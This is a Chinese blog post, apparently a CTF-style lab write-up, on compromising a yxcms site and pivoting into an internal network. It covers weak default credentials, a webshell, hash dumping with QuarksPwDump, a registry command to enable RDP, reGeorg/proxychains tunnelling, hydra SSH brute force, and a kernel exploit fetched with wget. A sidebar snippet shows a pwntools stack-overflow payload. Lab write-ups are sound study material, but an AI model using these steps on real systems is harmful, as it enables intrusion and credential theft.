获取getshell以及内网渗透

最新推荐文章于 2024-07-10 22:20:27 发布
最新推荐文章于 2024-07-10 22:20:27 发布
阅读量2k 收藏 5
点赞数 3
分类专栏: 渗透测试 文章标签: 内网渗透 Linux提权 密码爆破 弱口令
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45165528/article/details/103174818
版权

记一次靶场练习实验

文章目录

实验工具

VMware Workstation 15 Player
百度云链接 提取码:xbb5

搭建环境

1.外网靶场 IP:192.168.100.130 NAT模式
2.调整物理机的网卡VMnet8的ipv4为192.168.100.1
3.期间不允许使用虚拟机

实验要求

在两个靶场中找出三个flag

实验步骤

1.信息收集

在这里插入图片描述
进入网页之后发现是yxcms,可百度搜索与yxcms的相关信息。

第一个Flag(弱口令)

百度搜索yxcms的后台登陆页面,以及管理员的默认账号密码,看是否有弱口令的存在。
后台登陆页面为:http://192.168.100.130/index.php?r=admin
管理员的默认账号:admin 密码:123456
发现登陆成功,后台存在弱口令
进入后台之后找到前台模板模块,点击模块管理
在这里插入图片描述
发现页面的内容是可以编辑的,这是就可以想到将首页的代码直接改为大马的代码,重新刷新首页,发现成功显示的我们的大马文件
在这里插入图片描述
上传大马之后,直接执行命令,使用whoami查看权限
在这里插入图片描述
发现已经是system权限,所以就不用再提权了。此时我们应该考虑的就是想办法查看登录主机的密码。
由于没有登陆过虚拟机,系统中就没有缓存,所以mimikatz不能显示出密码,在这里我推荐一款密码查看工具:QuarksPwDump,这个工具可以导出密码的哈希值,然后直接百度搜索MD5,解密即可。
Windows系统中,可将QuarksPwDump.exe上传至C://Windows/temp下,(可读可写可执行),然后在执行命令模块中,将C:/WINDOWS/Temp/QuarksPwDump.exe写入命令行
在这里插入图片描述
得到了--dump-hash-local之后,复制,再次执行命令C:/WINDOWS/Temp/QuarksPwDump.exe --dump-hash-local导出哈希值
在这里插入图片描述
经过MD5的解密,密码为Hallo
此时就可以远程登录主机了,但是有一个前提,使用命令netstat -ano查看是否开放了3389端口。
在这里插入图片描述
确认3389端口开放之后,使用物理机,win+R之后输入mstsc启用远程桌面。输入IP之后,使用刚才导出的账号以及密码
在这里插入图片描述
注:如果对方未开启3389的话使用一句话命令REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f打开3389端口
此时就找到了flag1。原来藏在这丫。

寻找第二个Flag(hydra密码爆破)

进入主机之后,使用ipconfig查看主机IP
在这里插入图片描述
由此可以猜想内网的IP为172.16.1.1
桌面上有一个xshell的工具,是这台主机连接内网的工具,点开之后可以看到内网的IP确实为172.16.1.1,还得到了内网的用户名为admin
在这里插入图片描述
当连接的时候却需要爆破密码,这时就需要用到kali中的工具hydra。
这是就又涉及到了端口转发,通过大马上传reGeorg-master中的tunnel.nosocket.php文件到网站目录,打开之后,能够成功使用
在这里插入图片描述
然后运行kali中的reGeorgSocksProxy.py文件,使用命令python reGeorgSocksProxy.py -u http://192.168.100.130/tunnel.nosocket.php运行成功之后,需要用到kali中一款叫proxychains
首先修改proxychains中的配置文件,使用命令vi /etc/proxychains.conf打开配置文件之后找到最底部,将socks4修改为socks5 127.0.0.1 8888写完之后,wq保存退出
在这里插入图片描述
输入proxychains ssh 172.16.1.1登录内网但是需要输入password,此时就要用到工具hydra进行密码爆破,先使用命令gedit pass.txt自己写入一个字典文件,==(切记:写完最后一行之后千万不要点击回车,直接保存退出)==直接运行hydra使用命令proxychains hydra -l admin -p pass.txt ssh://172.16.1.1然后成功爆破出密码为123456
在这里插入图片描述
此时返回外网主机,通过xshell连接内网主机。成功进入主机之后我有个习惯,就是使用history查看管理员历史输入,然后发现了第二个flag
在这里插入图片描述

寻找第三个Flag(Linux提权)

通过上一步的密码爆破,输入id查看用户权限,
在这里插入图片描述
发现是普通用户权限,所以需要进行提权操作,输入命令uname -a查看系统信息
在这里插入图片描述
内核版本为2.6.18-194,使用相应的exp进行提权操作,将找到的exp通过大马上传至外网主机的目录下,然后通过命令wget 172.16.1.2/exp1 -O exp1进行下载操作,将exp1下载至内网目录下。
在这里插入图片描述
通过命令chmod 777 exp1修改exp1的权限为可读可写可执行,之后运行exp1成功提权为root用户。提权成功最明显的区别就是$和#的区别
在这里插入图片描述
通过ls查看当前目录下的文件,发现了第三个flag,本次实验结束!!!
在这里插入图片描述
[1]: http://meta.math.stackexchange.com/questions/5020/mathjax-basic-tutorial-and-quick-reference
[2]: https://mermaidjs.github.io/
[3]: https://mermaidjs.github.io/
[4]: http://adrai.github.io/flowchart.js/

VVsec
关注
专栏目录
内网渗透-Linux内网渗透
lza20001103的博客
08-16 1681
内网渗透-Linux内网渗透
BugKu_getshell
Kobalos的博客
09-07 2462
访问目标地址 看到是php的代码,格式应该是经过混淆加密的 推荐一个节省时间的网站: https://www.zhaoyuanma.com/phpjm.html 解出来发现是一个木马,试着用蚁剑连接一下,成功! 但是执行命令的时候显示red=127,猜测应该是有disable_functions对执行命令的函数进行限制,查看phpinfo确认一下 果然禁止的差不多了,试着用蚁剑插件市场下载的绕过工具进行绕过! 看到插件中显示的绕过需要的条件都满足了,直接点击开始,他会在当前目录下传文件 使用蚁.
Getshell 网站漏洞批量检测工具破解后使用教程
07-26
Getshell网站漏洞批量检测工具破解后使用教程,运行软件,等待大概 3分钟左右软件才会启动。
红日靶场----(三)2.漏洞利用
最新发布
zhouA0221的博客
07-10 698
上期的通过一句话木马实现对目标主机的持久后门我使用的是蚁剑,蚁剑安装及使用参考:下载地址:GitHub - AntSwordProject/AntSword-Loader: AntSword 加载器安装即使用:1. 快速入门 · 语雀利用cms管理后台GETSHELL的思路: (1)文件上传功能-上传Webshell (2)编辑默认的模板文件----替换原有的代码 (3)安装插件 (4)编辑器的缺陷 方法有很多种,我们使用YXCMS后台的文件上传功能GETSHELL。我们看到网站的公告信息上登录的地址在网站
渗透测试系列之iis解析漏洞getshell+内网渗透
win176489的博客
06-27 3164
本次渗透测试经验分享仅供大家学习交流 本次利用的环境为内网web服务器windows2003(模拟内网主机 ip192.168.152.128 192.168.79.128) 一台外网主机 (ip xxx.xxx.xxx.xxx ) 攻击机win10(ip 192.168.31.169) kali机(192.168.31.43) 环...
内网渗透-cobaltstrike之cs上线获取shell
lza20001103的博客
04-14 971
内网渗透-cobaltstrike之cs上线获取shell
app渗透测试实战Getshell
内心不种满鲜花就会长满杂草
05-17 8206
分享一下今天对某app的合法渗透测试,从基础的信息收集到拿到网站的shell的过程。
渗透测试-制作一个‘有吸引力的软件‘去获取电脑shell(功能很强大,有惊喜)
保持微笑的博客
01-16 1350
1.客户端渗透原理 在我们无法突破对方的网络边界的时候,往往需要使用客户端渗透这种方式对目标发起攻击。 实验环境:一台kali,一台win7,两台主机是在一个局域网内。
内网渗透--对不出网目标的打法
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
08-03 1637
配置网络 在VM虚拟机中按照下边的网络拓扑进行配置网络。网络拓扑图如下: win7具有双网卡,其中外网ip是192.168.8.133,内网网段是52。三台机器彼此互通,但是win server 2008和win2003不通外网。用我mac作为攻击机,来对这个靶场环境进行渗透测试。 外网打点 在win7这台靶机上,使用PHPStudy让网站可以运行起来。在攻击机上,访问http://192.168.8.133可以看到是一个phpStudy 探针。对这网站进行渗透,因为本文主要写在内网渗透过程..
掌握内网渗透之道,成为实战高手,看《内网渗透实战攻略》就够了
等风来
01-10 2670
当今,网络系统面临着越来越严峻的安全挑战。在众多的安全挑战中,一种有组织、有特定目标、长时间持续的新型网络攻击日益猖獗,国际上常称之为APT(Advanced Persistent Threat,高级持续性威胁)攻击。传统的渗透测试从外网发起攻击,并以攻破单台主机为目标。与之相比,APT攻击在技术上更加系统地实现了对目标内网主机的大批量控制,从而使业内对内网渗透技术的关注度提高到了一个空前的高度。
内网渗透-内网信息收集
lza20001103的博客
09-21 9484
内网信息收集 文章目录内网信息收集前言msf模块中的信息收集msf反弹shell后的信息收集内网信息收集后记 前言 当我们进行外网信息收集,漏洞探测以及漏洞利用后,获得了主机的权限后,我们需要扩大渗透的战果时,这是我们就要进行内网的渗透了,内网渗透最重要的还是前期的信息收集的操作了,就是我们的内网信息收集了,信息收集需要收集什么内容,对后期的横向和纵向移动都有很大的帮助。接下来给大家总结一下内网渗透中的信息收集的模块内容。 msf模块中的信息收集 Msf模块 run post/ run post/windo
内网渗透-Windows内网渗透
lza20001103的博客
08-15 1886
内网渗透-Windows内网渗透 文章目录内网渗透-Windows内网渗透前言一、信息收集1.1、SPN1.2、端口连接1.3、配置文件1.4、用户信息1.6、会话收集1.7、凭据收集navicat:SecureCRT:Xshell:WinSCP:VNC:1.8、DPAPI1.9、域信任1.10、域传送1.11、DNS记录获取1.12、WIFI1.13、GPP1.14、Seatbelt1.15、Bloodhound1.16、Exchange1.16.1 邮箱用户密码爆破1.16.3 信息收集二、传输通道2.
靶机练习:获取外网getshell进行内网渗透测试
weixin_45906324的博客
11-21 1300
实验靶场联系笔记 文章目录实验靶场联系笔记搭建环境实验工具实验要求实验流程 搭建环境 vmware导入两台靶场并开机,靶机下载地址 https://pan.baidu.com/s/1xd8MdGwqZqErtvu0QO5d5A 提取码 xbb5 然后配置物理机网卡的vmnet8ip 为100网段,192.168.100.1 实验工具 VMware® Workstation 15 Pro 版本:15...
redis渗透中的getshell问题总结
收集盒 Book box
10-20 1155
0x00 前言 redis现在很多都是直接对外开放端口,从外网无需任何验证即可直接访问到。相关的例子可以从shodan或者zoomeye上找到。那么问题来了,作为一个内存数据库,redis上肯定也有很多敏感信息,比如redis用于做session的存储,可能导致敏感信息泄露。不过最近研究redis从乌云社区和drops上看到有人getshell,思路比较有趣,特地写一下总结。 0x
网站后台getshell的方法总结
anlalu233的博客
03-24 5118
方法一:直接上传getshell 以dedecms为例,后台可以直接上传脚本文件,从而getshell,具体方法如下: 即可成功上传大马,并成功执行,从而拿下webshell。 坑:通常由于权限限制,导致只有该目录权限,无法进入其他目录,此时便可以采用…/跳转到根目录,或者其他目录,此时所采用的方法是如下的文件改名 方法二:数据库备份getshell 以南方数据cms为例: 1,首先上传一张...
手把手教你如何进行内网渗透
热门推荐
iO快到碗里来
11-19 8万+
0x00 Preface 内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。 内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。 0x01 信息收集 systeminfo 查看系统详细信息,如OS版本、补丁安装情况,可以根据这些信息筛选可利用的漏洞。 net start 查看启动进
实战 | 手把手教你如何进行内网渗透
jennycisp的博客
06-25 1943
内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。某内网靶场的详细教程:Vulnstack(一)内网渗透过程中经常会涉及到内网穿透,如何理解内网穿透以及端口转发、端口映射等相关知识可以参考:如何从零构建对内网穿透的理解。
内网渗透-实战|手把手教你如何进行内网渗透
lza20001103的博客
04-14 4214
内网渗透-实战|手把手教你如何进行内网渗透
我怎么利用vuln();去获取flag ,ip和端口是动态的
06-08
获取 flag 的过程中,你需要明确以下两个步骤: 1. 获取当前比赛的 IP 地址和端口号 2. 利用获取到的 IP 地址和端口号,构造针对 vuln 函数的攻击 payload,从而获取 flag。 我们已经在上一个问题中介绍了如何编写一个从域名获取 IP 地址和端口号的函数,你可以将其添加到你的攻击脚本中。具体的代码如下: ```python import socket def get_ip_port(domain): try: ip = socket.gethostbyname(domain) port = 1337 # 假设默认端口为 1337 # 在这里添加获取端口号的代码 return ip, port except Exception as e: print(f"Failed to get IP and port: {e}") return None, None ``` 在获取到 IP 地址和端口号之后,你可以编写 payload,从而利用 vuln 函数获取 flag。具体的 payload 取决于 vuln 函数的具体实现,一般来说,可以利用栈溢出漏洞来执行 shell 函数,从而获取 shell 权限,然后使用 shell 命令获取 flag。 以下是一个示例 payload,你可以根据实际情况进行调整: ```python from pwn import * # 获取当前比赛的 IP 地址和端口号 ip, port = get_ip_port("example.com") if ip is None or port is None: exit() # 构造 payload payload = b'A' * 0x108 # 假设偏移量为 0x108 payload += p64(0x4005E6) # shell 函数的地址,可以根据实际情况进行调整 # 连接到 vuln 函数 p = remote(ip, port) # 发送 payload p.sendline(payload) # 进入交互模式,执行 shell 命令获取 flag p.interactive() ``` 上述代码中,我们使用了 pwntools 模块来连接到 vuln 函数,发送 payload,并进入交互模式。你需要根据实际情况调整 payload 中的偏移量和 shell 函数的地址。另外,由于我们并不知道 flag 的具体位置,因此需要通过 shell 命令来获取 flag,具体的 shell 命令取决于 flag 的获取方式。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值